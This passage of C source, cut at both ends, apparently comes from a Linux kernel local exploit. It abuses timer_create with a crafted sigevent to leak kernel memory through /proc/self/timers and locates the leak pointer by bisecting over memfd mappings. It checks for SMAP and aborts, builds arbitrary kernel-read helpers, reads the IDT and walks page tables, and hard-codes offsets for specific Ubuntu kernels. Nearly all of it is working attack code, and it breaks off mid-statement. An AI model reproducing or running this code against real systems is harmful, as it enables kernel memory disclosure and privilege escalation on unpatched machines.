O_TASK_STRUCT_PID\t\t1096\n#define 
O_MM_STRUCT_MMAP\t\t0\n#define O_MM_STRUCT_PGD\t\t\t64\n#define O_VM_AREA_STRUCT_VM_START\t0\n#define O_VM_AREA_STRUCT_VM_END\t\t8\n#define O_VM_AREA_STRUCT_VM_NEXT\t16\n#define O_VM_AREA_STRUCT_VM_FLAGS\t80\n#endif\n\n#if 0\n// Ubuntu xenial 4.13.0-38-generic\n#define KERNEL_START\t\t\t0xffffffff81000000ul\n#define O_DIVIDE_ERROR\t\t\t(0xffffffff81a017b0ul - KERNEL_START)\n#define O_INIT_TASK\t\t\t(0xffffffff82212480ul - KERNEL_START)\n#define O_INIT_MM\t\t\t(0xffffffff82302760ul - KERNEL_START)\n#define O_PAGE_OFFSET_BASE\t\t(0xffffffff82248a90ul - KERNEL_START)\n#define O_TASK_STRUCT_TASKS\t\t2048\n#define O_TASK_STRUCT_MM\t\t2128\n#define O_TASK_STRUCT_PID\t\t2304\n#define O_MM_STRUCT_MMAP\t\t0\n#define O_MM_STRUCT_PGD\t\t\t80\n#define O_VM_AREA_STRUCT_VM_START\t0\n#define O_VM_AREA_STRUCT_VM_END\t\t8\n#define O_VM_AREA_STRUCT_VM_NEXT\t16\n#define O_VM_AREA_STRUCT_VM_FLAGS\t80\n#endif\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n#ifndef SYS_memfd_create\n#define SYS_memfd_create\t319\n#endif\n\n#ifndef O_PATH\n#define O_PATH\t\t\t010000000\n#endif\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n#define PAGE_SHIFT\t\t12\n#define PAGE_SIZE\t\t(1ul << PAGE_SHIFT)\n#define PAGE_MASK\t\t(~(PAGE_SIZE - 1))\n\n#define HUGE_PAGE_SHIFT\t\t21\n#define HUGE_PAGE_SIZE\t\t(1ul << HUGE_PAGE_SHIFT)\n#define HUGE_PAGE_MASK\t\t(~(HUGE_PAGE_SIZE - 1))\n\n#define TASK_SIZE\t\t(1ul << 47)\n#define\tPAGE_OFFSET_BASE\t0xffff880000000000ul\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n#define LOG_INFO\t1\n#define LOG_DEBUG\t2\n\n#define log(level, format, 
args...)\t\t\t\t\t\\\n\tdo {\t\t\t\t\t\t\t\t\\\n\t\tif (level == LOG_INFO)\t\t\t\t\t\\\n\t\t\tprintf(format, ## args);\t\t\t\\\n\t\telse\t\t\t\t\t\t\t\\\n\t\t\tfprintf(stderr, format, ## args);\t\t\\\n\t} while(0)\n\n#define info(format, args...) log(LOG_INFO, format, ## args)\n\n#if (DEBUG >= 1)\n#define debug1(format, args...) log(LOG_DEBUG, format, ## args)\n#else\n#define debug1(format, args...)\n#endif\n\n#if (DEBUG >= 2)\n#define debug2(format, args...) log(LOG_DEBUG, format, ## args)\n#else\n#define debug2(format, args...)\n#endif\n\n#define min(x, y) ((x) < (y) ? (x) : (y))\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\nstatic void print_chunk(int level, unsigned long src_addr, char *buffer,\n\t\t\t\tint len, int chunk_size) {\n\tint i;\n\n\tassert(len <= chunk_size);\n\n\tlog(level, \"%016lx: \", src_addr);\n\tfor (i = 0; i < len; i++)\n\t\tlog(level, \"%02hx \", (unsigned char)buffer[i]);\n\tfor (i = len; i < chunk_size; i++)\n\t\tlog(level, \" \");\n\n\tlog(level, \" \");\n\n\tfor (i = 0; i < len; i++) {\n\t\tif (isalnum(buffer[i]))\n\t\t\tlog(level, \"%c\", buffer[i]);\n\t\telse\n\t\t\tlog(level, \".\");\n\t}\n\n\tlog(level, \"\\n\");\n}\n\nstatic void print_bytes(int level, unsigned long src_addr, char *buffer,\n\t\t\t\tint len) {\n\tint chunk_size = 16;\n\tassert(chunk_size % 2 == 0);\n\n\tint chunk;\n\tfor (chunk = 0; chunk < len / chunk_size; chunk++)\n\t\tprint_chunk(level, src_addr + chunk * chunk_size,\n\t\t\t&buffer[chunk * chunk_size], chunk_size, chunk_size);\n\n\tint rem = len % chunk_size;\n\tif (rem != 0)\n\t\tprint_chunk(level, src_addr + len - rem,\n\t\t\t&buffer[len - rem], rem, chunk_size);\n}\n\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n#define MIN_KERNEL_BASE 0xffffffff81000000ul\n#define 
MAX_KERNEL_BASE 0xffffffffff000000ul\n#define MAX_KERNEL_IMAGE 0x8000000ul // 128 MB\n\n#define MMAP_ADDR_SPAN (MAX_KERNEL_BASE - MIN_KERNEL_BASE + MAX_KERNEL_IMAGE)\n#define MMAP_ADDR_START 0x200000000ul\n#define MMAP_ADDR_END (MMAP_ADDR_START + MMAP_ADDR_SPAN)\n\n#define OPTIMAL_PTR_OFFSET ((MMAP_ADDR_START - MIN_KERNEL_BASE) / 8)\n// == 0x4fe00000\n\n#define MAX_MAPPINGS 1024\n#define MEMFD_SIZE (MMAP_ADDR_SPAN / MAX_MAPPINGS)\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\nstatic struct proc_reader g_proc_reader;\nstatic unsigned long g_leak_ptr_addr = 0;\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n#define PROC_INITIAL_SIZE 1024\n#define PROC_CHUNK_SIZE 1024\n\nstruct proc_reader {\n\tchar *buffer;\n\tint buffer_size;\n\tint read_size;\n};\n\nstatic void proc_init(struct proc_reader* pr) {\n\tdebug2(\"proc_init: %016lx\\n\", pr);\n\n\tpr->buffer = malloc(PROC_INITIAL_SIZE);\n\tif (pr->buffer == NULL) {\n\t\tperror(\"[-] proc_init: malloc()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\tpr->buffer_size = PROC_INITIAL_SIZE;\n\tpr->read_size = 0;\n\n\tdebug2(\"proc_init = void\\n\");\n}\n\nstatic void proc_ensure_size(struct proc_reader* pr, int size) {\n\tif (pr->buffer_size >= size)\n\t\treturn;\n\twhile (pr->buffer_size < size)\n\t\tpr->buffer_size <<= 1;\n\tpr->buffer = realloc(pr->buffer, pr->buffer_size);\n\tif (pr->buffer == NULL) {\n\t\tperror(\"[-] proc_ensure_size: realloc()\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\nstatic int proc_read(struct proc_reader* pr, const char *file) {\n\tdebug2(\"proc_read: file: %s, pr->buffer_size: %d\\n\",\n\t\t\tfile, pr->buffer_size);\n\n\tint fd = open(file, O_RDONLY);\n\tif (fd == -1) {\n\t\tperror(\"[-] proc_read: open()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tpr->read_size = 0;\n\twhile (true) {\n\t\tproc_ensure_size(pr, pr->read_size + PROC_CHUNK_SIZE);\n\t\tint bytes_read = read(fd, &pr->buffer[pr->read_size],\n\t\t\t\t\tPROC_CHUNK_SIZE);\n\t\tif 
(bytes_read == -1) {\n\t\t\tperror(\"[-] read(proc)\");\n\t\t\texit(EXIT_FAILURE);\n\t\t}\n\t\tpr->read_size += bytes_read;\n\t\tif (bytes_read < PROC_CHUNK_SIZE)\n\t\t\tbreak;\n\t}\n\n\tclose(fd);\n\n\tdebug2(\"proc_read = %d\\n\", pr->read_size);\n\treturn pr->read_size;\n}\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\ntypedef union k_sigval {\n\tint sival_int;\n\tvoid *sival_ptr;\n} k_sigval_t;\n\n#define __ARCH_SIGEV_PREAMBLE_SIZE\t(sizeof(int) * 2 + sizeof(k_sigval_t))\n#define SIGEV_MAX_SIZE\t64\n#define SIGEV_PAD_SIZE\t((SIGEV_MAX_SIZE - __ARCH_SIGEV_PREAMBLE_SIZE) \\\n\t\t\t\t/ sizeof(int))\n\ntypedef struct k_sigevent {\n\tk_sigval_t sigev_value;\n\tint sigev_signo;\n\tint sigev_notify;\n\tunion {\n\t\tint _pad[SIGEV_PAD_SIZE];\n\t\tint _tid;\n\n\t\tstruct {\n\t\t\tvoid (*_function)(sigval_t);\n\t\t\tvoid *_attribute;\n\t\t} _sigev_thread;\n\t} _sigev_un;\n} k_sigevent_t;\n\nstatic void leak_setup() {\n\tk_sigevent_t se;\n\tmemset(&se, 0, sizeof(se));\n\tse.sigev_signo = SIGRTMIN;\n\tse.sigev_notify = OPTIMAL_PTR_OFFSET;\n\ttimer_t timerid = 0;\n\n\tint rv = syscall(SYS_timer_create, CLOCK_REALTIME,\n\t\t\t\t(void *)&se, &timerid);\n\tif (rv != 0) {\n\t\tperror(\"[-] timer_create()\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\nstatic void leak_parse(char *in, int in_len, char **start, char **end) {\n\tconst char *needle = \"notify: \";\n\t*start = memmem(in, in_len, needle, strlen(needle));\n\tassert(*start != NULL);\n\t*start += strlen(needle);\n\n\tassert(in_len > 0);\n\tassert(in[in_len - 1] == '\\n');\n\t*end = &in[in_len - 2];\n\twhile (*end > in && **end != '\\n')\n\t\t(*end)--;\n\tassert(*end > in);\n\twhile (*end > in && **end != '/')\n\t\t(*end)--;\n\tassert(*end > in);\n\tassert((*end)[1] = 'p' && (*end)[2] == 'i' && (*end)[3] == 'd');\n\n\tassert(*end >= *start);\n}\n\nstatic void leak_once(char **start, char **end) {\n\tint read_size = proc_read(&g_proc_reader, 
\"/proc/self/timers\");\n\tleak_parse(g_proc_reader.buffer, read_size, start, end);\n}\n\nstatic int leak_once_and_copy(char *out, int out_len) {\n\tassert(out_len > 0);\n\n\tchar *start, *end;\n\tleak_once(&start, &end);\n\n\tint size = min(end - start, out_len);\n\tmemcpy(out, start, size);\n\n\tif (size == out_len)\n\t\treturn size;\n\n\tout[size] = 0;\n\treturn size + 1;\n}\n\nstatic void leak_range(unsigned long addr, size_t length, char *out) {\n\tsize_t total_leaked = 0;\n\twhile (total_leaked < length) {\n\t\tunsigned long addr_to_leak = addr + total_leaked;\n\t\t*(unsigned long *)g_leak_ptr_addr = addr_to_leak;\n\t\tdebug2(\"leak_range: offset %ld, addr: %lx\\n\",\n\t\t\ttotal_leaked, addr_to_leak);\n\t\tint leaked = leak_once_and_copy(out + total_leaked,\n\t\t\tlength - total_leaked);\n\t\ttotal_leaked += leaked;\n\t}\n}\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\nstatic void mmap_fixed(unsigned long addr, size_t size) {\n\tvoid *rv = mmap((void *)addr, size, PROT_READ | PROT_WRITE,\n\t\t\tMAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\n\tif (rv != (void *)addr) {\n\t\tperror(\"[-] mmap()\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\nstatic void mmap_fd_over(int fd, unsigned long fd_size, unsigned long start,\n\t\t\tunsigned long end) {\n\tint page_size = PAGE_SIZE;\n\tassert(fd_size % page_size == 0);\n\tassert(start % page_size == 0);\n\tassert(end % page_size == 0);\n\tassert((end - start) % fd_size == 0);\n\n\tdebug1(\"mmap_fd_over: [%lx, %lx)\\n\", start, end);\n\n\tunsigned long addr;\n\tfor (addr = start; addr < end; addr += fd_size) {\n\t\tvoid *rv = mmap((void *)addr, fd_size, PROT_READ,\n\t\t\t\tMAP_FIXED | MAP_PRIVATE, fd, 0);\n\t\tif (rv != (void *)addr) {\n\t\t\tperror(\"[-] mmap()\");\n\t\t\texit(EXIT_FAILURE);\n\t\t}\n\t}\n\n\tdebug1(\"mmap_fd_over = void\\n\");\n}\n\nstatic void remap_fd_over(int fd, unsigned long fd_size, unsigned long start,\n\t\t\tunsigned long end) {\n\tint rv = munmap((void 
*)start, end - start);\n\tif (rv != 0) {\n\t\tperror(\"[-] munmap()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\tmmap_fd_over(fd, fd_size, start, end);\n}\n\n#define MEMFD_CHUNK_SIZE 0x1000\n\nstatic int create_filled_memfd(const char *name, unsigned long size,\n\t\t\t\tunsigned long value) {\n\tint i;\n\tchar buffer[MEMFD_CHUNK_SIZE];\n\n\tassert(size % MEMFD_CHUNK_SIZE == 0);\n\n\tint fd = syscall(SYS_memfd_create, name, 0);\n\tif (fd < 0) {\n\t\tperror(\"[-] memfd_create()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tfor (i = 0; i < sizeof(buffer) / sizeof(value); i++)\n\t\t*(unsigned long *)&buffer[i * sizeof(value)] = value;\n\n\tfor (i = 0; i < size / sizeof(buffer); i++) {\n\t\tint bytes_written = write(fd, &buffer[0], sizeof(buffer));\n\t\tif (bytes_written != sizeof(buffer)) {\n\t\t\tperror(\"[-] write(memfd)\");\n\t\t\texit(EXIT_FAILURE);\n\t\t}\n\t}\n\n\treturn fd;\n}\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\nstatic const char *evil = \"evil\";\nstatic const char *good = \"good\";\n\nstatic bool bisect_probe() {\n\tchar *start, *end;\n\tleak_once(&start, &end);\n\treturn *start == 'g';\n}\n\nstatic unsigned long bisect_via_memfd(unsigned long fd_size,\n\t\t\t\tunsigned long start, unsigned long end) {\n\tassert((end - start) % fd_size == 0);\n\n\tint fd_evil = create_filled_memfd(\"evil\", fd_size, (unsigned long)evil);\n\tint fd_good = create_filled_memfd(\"good\", fd_size, (unsigned long)good);\n\n\tunsigned long left = 0;\n\tunsigned long right = (end - start) / fd_size;\n\n\twhile (right - left > 1) {\n\t\tunsigned long middle = left + (right - left) / 2;\n\t\tremap_fd_over(fd_evil, fd_size, start + left * fd_size,\n\t\t\t\tstart + middle * fd_size);\n\t\tremap_fd_over(fd_good, fd_size, start + middle * fd_size,\n\t\t\t\tstart + right * fd_size);\n\t\tbool probe = bisect_probe();\n\t\tif (probe)\n\t\t\tleft = middle;\n\t\telse\n\t\t\tright = middle;\n\t}\n\n\tint rv = munmap((void *)start, end - start);\n\tif (rv != 0) 
{\n\t\tperror(\"[-] munmap()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tclose(fd_evil);\n\tclose(fd_good);\n\n\treturn start + left * fd_size;\n}\n\nstatic unsigned long bisect_via_assign(unsigned long start, unsigned long end) {\n\tint word_size = sizeof(unsigned long);\n\n\tassert((end - start) % word_size == 0);\n\tassert((end - start) % PAGE_SIZE == 0);\n\n\tmmap_fixed(start, end - start);\n\n\tunsigned long left = 0;\n\tunsigned long right = (end - start) / word_size;\n\n\twhile (right - left > 1) {\n\t\tunsigned long middle = left + (right - left) / 2;\n\t\tunsigned long a;\n\t\tfor (a = left; a < middle; a++)\n\t\t\t*(unsigned long *)(start + a * word_size) =\n\t\t\t\t(unsigned long)evil;\n\t\tfor (a = middle; a < right; a++)\n\t\t\t*(unsigned long *)(start + a * word_size) =\n\t\t\t\t(unsigned long)good;\n\t\tbool probe = bisect_probe();\n\t\tif (probe)\n\t\t\tleft = middle;\n\t\telse\n\t\t\tright = middle;\n\t}\n\n\tint rv = munmap((void *)start, end - start);\n\tif (rv != 0) {\n\t\tperror(\"[-] munmap()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\treturn start + left * word_size;\n}\n\nstatic unsigned long bisect_leak_ptr_addr() {\n\tunsigned long addr = bisect_via_memfd(\n\t\t\tMEMFD_SIZE, MMAP_ADDR_START, MMAP_ADDR_END);\n\tdebug1(\"%lx %lx\\n\", addr, addr + MEMFD_SIZE);\n\taddr = bisect_via_memfd(PAGE_SIZE, addr, addr + MEMFD_SIZE);\n\tdebug1(\"%lx %lx\\n\", addr, addr + PAGE_SIZE);\n\taddr = bisect_via_assign(addr, addr + PAGE_SIZE);\n\tdebug1(\"%lx\\n\", addr);\n\treturn addr;\n}\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n#define CPUINFO_SMEP\t1\n#define CPUINFO_SMAP\t2\n#define CPUINFO_KAISER\t4\n#define CPUINFO_PTI\t8\n\nstatic int cpuinfo_scan() {\n\tint length = proc_read(&g_proc_reader, \"/proc/cpuinfo\");\n\tchar *buffer = &g_proc_reader.buffer[0];\n\tint rv = 0;\n\tchar* found = memmem(buffer, length, \"smep\", 4);\n\tif (found != NULL)\n\t\trv |= CPUINFO_SMEP;\n\tfound = memmem(buffer, length, \"smap\", 
4);\n\tif (found != NULL)\n\t\trv |= CPUINFO_SMAP;\n\tfound = memmem(buffer, length, \"kaiser\", 4);\n\tif (found != NULL)\n\t\trv |= CPUINFO_KAISER;\n\tfound = memmem(buffer, length, \" pti\", 4);\n\tif (found != NULL)\n\t\trv |= CPUINFO_PTI;\n\treturn rv;\n}\n\nstatic void cpuinfo_check() {\n\tint rv = cpuinfo_scan();\n\tif (rv & CPUINFO_SMAP) {\n\t\tinfo(\"[-] SMAP detected, no bypass available, aborting\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\nstatic void arbitrary_read_init() {\n\tinfo(\"[.] setting up proc reader\\n\");\n\tproc_init(&g_proc_reader);\n\tinfo(\"[~] done\\n\");\n\n\tinfo(\"[.] checking /proc/cpuinfo\\n\");\n\tcpuinfo_check();\n\tinfo(\"[~] looks good\\n\");\n\n\tinfo(\"[.] setting up timer\\n\");\n\tleak_setup();\n\tinfo(\"[~] done\\n\");\n\n\tinfo(\"[.] finding leak pointer address\\n\");\n\tg_leak_ptr_addr = bisect_leak_ptr_addr();\n\tinfo(\"[+] done: %016lx\\n\", g_leak_ptr_addr);\n\n\tinfo(\"[.] 
mapping leak pointer page\\n\");\n\tmmap_fixed(g_leak_ptr_addr & ~(PAGE_SIZE - 1), PAGE_SIZE);\n\tinfo(\"[~] done\\n\");\n}\n\nstatic void read_range(unsigned long addr, size_t length, char *buffer) {\n\tleak_range(addr, length, buffer);\n}\n\nstatic uint64_t read_8(unsigned long addr) {\n\tuint64_t result;\n\tread_range(addr, sizeof(result), (char *)&result);\n\treturn result;\n}\n\nstatic uint32_t read_4(unsigned long addr) {\n\tuint32_t result;\n\tread_range(addr, sizeof(result), (char *)&result);\n\treturn result;\n}\n\nstatic uint64_t read_field_8(unsigned long addr, int offset) {\n\treturn read_8(addr + offset);\n}\n\nstatic uint64_t read_field_4(unsigned long addr, int offset) {\n\treturn read_4(addr + offset);\n}\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\nstruct idt_register {\n\tuint16_t length;\n\tuint64_t base;\n} __attribute__((packed));\n\nstruct idt_gate {\n\tuint16_t offset_1; // bits 0..15\n\tuint32_t shit_1;\n\tuint16_t offset_2; // bits 16..31\n\tuint32_t offset_3; // bits 32..63\n\tuint32_t shit_2;\n} __attribute__((packed));\n\nstatic uint64_t idt_gate_addr(struct idt_gate *gate) {\n\tuint64_t addr = gate->offset_1 + ((uint64_t)gate->offset_2 << 16) +\n\t\t((uint64_t)gate->offset_3 << 32);\n\treturn addr;\n}\n\nstatic void get_idt(struct idt_register *idtr) {\n\tasm ( \"sidt %0\" : : \"m\"(*idtr) );\n\tdebug1(\"get_idt_base: base: %016lx, length: %d\\n\",\n\t\t\tidtr->base, idtr->length);\n}\n\nstatic void print_idt(int entries) {\n\tchar buffer[4096];\n\tstruct idt_register idtr;\n\tint i;\n\n\tget_idt(&idtr);\n\tassert(idtr.length <= sizeof(buffer));\n\tread_range(idtr.base, idtr.length, &buffer[0]);\n\n\tinfo(\"base: %016lx, length: %d\\n\", idtr.base,\n\t\t\t(int)idtr.length);\n\n\tentries = min(entries, idtr.length / sizeof(struct 
idt_gate));\n\tfor (i = 0; i < entries; i++) {\n\t\tstruct idt_gate *gate = (struct idt_gate *)&buffer[0] + i;\n\t\tuint64_t addr = idt_gate_addr(gate);\n\t\tinfo(\"gate #%03d: %016lx\\n\", i, addr);\n\t}\n}\n\nstatic uint64_t read_idt_gate(int i) {\n\tchar buffer[4096];\n\tstruct idt_register idtr;\n\n\tget_idt(&idtr);\n\tassert(idtr.length <= sizeof(buffer));\n\tassert(i <= idtr.length / sizeof(struct idt_gate));\n\tread_range(idtr.base, idtr.length, &buffer[0]);\n\n\tstruct idt_gate *gate = (struct idt_gate *)&buffer[0] + i;\n\tuint64_t addr = idt_gate_addr(gate);\n\treturn addr;\n}\n\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n// # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n\n#define PTRS_PER_PGD\t\t512\n#define PTRS_PER_PUD\t\t512\n#define PTRS_PER_PMD\t\t512\n#define PTRS_PER_PTE\t\t512\n\n#define PGD_SHIFT\t\t39\n#define PUD_SHIFT\t\t30\n#define PMD_SHIFT\t\t21\n\n#define pgd_index(addr)\t\t(((addr) >> PGD_SHIFT) & (PTRS_PER_PGD - 1))\n#define pud_index(addr)\t\t(((addr) >> PUD_SHIFT) & (PTRS_PER_PUD - 1))\n#define pmd_index(addr)\t\t(((addr) >> PMD_SHIFT) & (PTRS_PER_PMD - 1))\n#define pte_index(addr)\t\t(((addr) >> PAGE_SHIFT) & (PTRS_PER_PTE - 1))\n\n#define _PAGE_BIT_PRESENT\t0\n#define _PAGE_BIT_ACCESSED\t5\n#define _PAGE_BIT_DIRTY\t\t6\n#define _PAGE_BIT_PSE\t\t7\n#define _PAGE_BIT_GLOBAL\t8\n#define _PAGE_BIT_PROTNONE\t_PAGE_BIT_GLOBAL\n\n#define _PAGE_PRESENT\t\t(1ul << _PAGE_BIT_PRESENT)\n#define _PAGE_ACCESSED\t\t(1ul << _PAGE_BIT_ACCESSED)\n#define _PAGE_DIRTY\t\t(1ul << _PAGE_BIT_DIRTY)\n#define _PAGE_PSE\t\t(1ul << _PAGE_BIT_PSE)\n#define _PAGE_PROTNONE\t\t(1ul << _PAGE_BIT_PROTNONE)\n#define _PAGE_KNL_ERRATUM_MASK\t(_PAGE_DIRTY | _PAGE_ACCESSED)\n\n#define pgd_none(value)\t\t((value) == 0)\n#define pud_none(value)\t\t(((value) & ~(_PAGE_KNL_ERRATUM_MASK)) == 0)\n#define pmd_none(value)\t\t(((value) 
& ~(_PAGE_KNL_ERRATUM_MASK)) == 0)\n#define pte_none(value)\t\t(((value) & ~(_PAGE_KNL_ERRATUM_MASK)) == 0)\n\n#define __PHYSICAL_MASK_SHIFT\t52\n#define __PHYSICAL_MASK\t\t((1ul << __PHYSICAL_MASK_SHIFT) - 1)\n#define PHYSICAL_PAGE_MASK\t(PAGE_MASK & __PHYSICAL_MASK)\n#define PTE_PFN_MASK\t\t(PHYSICAL_PAGE_MASK)\n#define PTE_FLAGS_MASK\t\t(~PTE_PFN_MASK)\n\n#define pgd_flags(value)\t(value & PTE_FLAGS_MASK)\n#define pud_flags(value)\t(value & PTE_FLAGS_MASK)\n#define pmd_flags(value)\t(value & PTE_FLAGS_MASK)\n#define pte_flags(value)\t(value & PTE_FLAGS_MASK)\n\n#define pgd_present(value)\t(pgd_flags(value) & _PAGE_PRESENT)\n#define pud_present(value)\t(pud_flags(value) & _PAGE_PRESENT)\n#define pmd_present(value)\t(pmd_flags(value) & (_PAGE_PRESENT | \\\n\t\t\t\t\t_PAGE_PROTNONE | _PAGE_PSE))\n#define pte_present(value)\t(pte_flags(value) & (_PAGE_PRESENT | \\\n\t\t\t\t\t_PAGE_PROTNONE))\n\nstruct pte_entry {\n\tunsigned long\t\taddr;\n\tunsigned long\t\tentries[PTRS_PER_PTE];\n};\n\nstruct pmd_entry {\n\tunsigned long\t\taddr;\n\tstruct {\n\t\tbool\t\t\t\thuge;\n\t\tunion {\n\t\t\tstruct pte_entry\t*pte;\n\t\t\tunsigned long\t\tphys;\n\t\t};\n\t}\t\t\tentries[PTRS_PER_PMD];\n};\n\nstruct pud_entry {\n\tunsigned long\t\taddr;\n\tstruct pmd_entry\t*entries[PTRS_PER_PUD];\n};\n\nstruct pgd_entry {\n\tunsigned long\t\taddr;\n\tstruct pud_entry\t*entries[PTRS_PER_PGD];\n};\n\nstruct ptsc {\n\tunsigned long\t\tphysmap;\n\tstruct pgd_entry\tentry;\n};\n\nstatic struct pte_entry *ptsc_alloc_pte_entry(unsigned long addr) {\n\tstruct pte_entry *entry = malloc(sizeof(*entry));\n\tif (!entry) {\n\t\tperror(\"[-] malloc()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\tentry->addr = addr;\n\tmemset(&entry->entries[0], 0, sizeof(entry->entries));\n\treturn entry;\n}\n\nstatic struct pmd_entry *ptsc_alloc_pmd_entry(unsigned long addr) {\n\tstruct pmd_entry *entry = malloc(sizeof(*entry));\n\tif (!entry) {\n\t\tperror(\"[-] malloc()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\tentry->addr = 
addr;\n\tmemset(&entry->entries[0], 0, sizeof(entry->entries));\n\treturn entry;\n}\n\nstatic struct pud_entry *ptsc_alloc_pud_entry(unsigned long addr) {\n\tstruct pud_entry *entry = malloc(sizeof(*entry));\n\tif (!entry) {\n\t\tperror(\"[-] malloc()\");\n\t\texit(EXIT_FAILURE);\n\t}\n\tentry->addr = addr;\n\tmemset(&entry->entries[0], 0, sizeof(entry->entries));\n\treturn entry;\n}\n\nstatic void ptsc_init(struct ptsc* ptsc, unsigned long physmap,\n\t\t\t\tunsigned long pgd) {\n\tptsc->physmap = physmap;\n\tptsc->entry.addr = pgd;\n\tmemset(&ptsc->entry.entries[0], 0, sizeof(ptsc->entry.entries));\n}\n\nstatic unsigned long ptsc_page_virt_to_phys(struct ptsc* ptsc,\n\t\t\t\t\t\tunsigned long addr) {\n\tstruct pgd_entry *pgd_e;\n\tstruct pud_entry *pud_e;\n\tstruct pmd_entry *pmd_e;\n\tstruct pte_entry *pte_e;\n\tunsigned long phys_a;\n\tint index;\n\n\tdebug1(\"looking up phys addr for %016lx:\\n\", addr);\n\n\tpgd_e = &ptsc->entry;\n\n\tindex = pgd_index(addr);\n\tdebug1(\" pgd: %016lx, index: %d\\n\", pgd_e->addr, index);\n\tif (!pgd_e->entries[index]) {\n\t\tunsigned long pgd_v = read_8(\n\t\t\tpgd_e->addr + index * sizeof(unsigned long));\n\t\tdebug1(\" -> %016lx\\n\", pgd_v);\n\t\tif (pgd_none(pgd_v)) {\n\t\t\tdebug1(\" not found, pgd is none\\n\");\n\t\t\treturn 0;\n\t\t}\n\t\tif (!pgd_present(pgd_v)) {\n\t\t\tdebug1(\" not found, pgd is not present\\n\");\n\t\t\treturn 0;\n\t\t}\n\t\tunsigned long pud_a =\n\t\t\tptsc->physmap + (pgd_v & PHYSICAL_PAGE_MASK);\n\t\tpud_e = ptsc_alloc_pud_entry(pud_a);\n\t\tpgd_e->entries[index] = pud_e;\n\t}\n\tpud_e = pgd_e->entries[index];\n\n\tindex = pud_index(addr);\n\tdebug1(\" pud: %016lx, index: %d\\n\", pud_e->addr, index);\n\tif (!pud_e->entries[index]) {\n\t\tunsigned long pud_v = read_8(\n\t\t\tpud_e->addr + index * sizeof(unsigned long));\n\t\tdebug1(\" -> %016lx\\n\", pud_v);\n\t\tif (pud_none(pud_v)) {\n\t\t\tdebug1(\" not found, pud is none\\n\");\n\t\t\treturn 0;\n\t\t}\n\t\tif (!pud_present(pud_v)) 
{\n\t\t\tdebug1(\" not found, pud is not present\\n\");\n\t\t\treturn 0;\n\t\t}\n\t\tunsigned long pmd_a =\n\t\t\tptsc->physmap + (pud_v & PHYSICAL_PAGE_MASK);\n\t\tpmd_e = ptsc_alloc_pmd_entry(pmd_a);\n\t\tpud_e->entries[index] = pmd_e;\n\t}\n\tpmd_e = pud_e->entries[index];\n\n\tindex = pmd_index(addr);\n\tdebug1(\" pmd: %016lx, index: %d\\n\", pmd_e->addr, index);\n\tif (!pmd_e->entries[index].pte) {\n\t\tunsigned long pmd_v = read_8(\n\t\t\tpmd_e->addr + index * sizeof(unsigned long));\n\t\tdebug1(\" -> %016lx\\n\", pmd_v);\n\t\tif (pmd_none(pmd_v)) {\n\t\t\tdebug1(\" not found, pmd is none\\n\");\n\t\t\treturn 0;\n\t\t}\n\t\tif (!pmd_present(pmd_v)) {\n\t\t\tdebug1(\" not found, pmd is not present\\n\");\n\t\t\treturn 0;\n\t\t}\n\t\tif (pmd_flags(pmd_v) & _PAGE_PSE) {\n\t\t\tphys_a = ptsc->physmap + (pmd_v & PHYSICAL_PAGE_MASK) +\n\t\t\t\t\t(addr & ~HUGE_PAGE_MASK);\n\t\t\tpmd_e->entries[index].phys = phys_a;\n\t\t\tpmd_e->entries[index].huge = true;\n\t\t} else {\n\t\t\tunsigned long pte_a =\n\t\t\t\tptsc->physmap + (pmd_v & PHYSICAL_PAGE_MASK);\n\t\t\tpte_e = ptsc_alloc_pte_entry(pte_a);\n\t\t\tpmd_e->entries[index].pte = pte_e;\n\t\t\tpmd_e->entries[index].huge = false;\n\t\t}\n\t}\n\n\tif (pmd_e->entries[index].huge) {\n\t\tdebug1(\" phy: %016lx (huge)\\n\", phys_a);\n\t\treturn pmd_e->entries[index].phys;\n\t}\n\n\tpte_e = 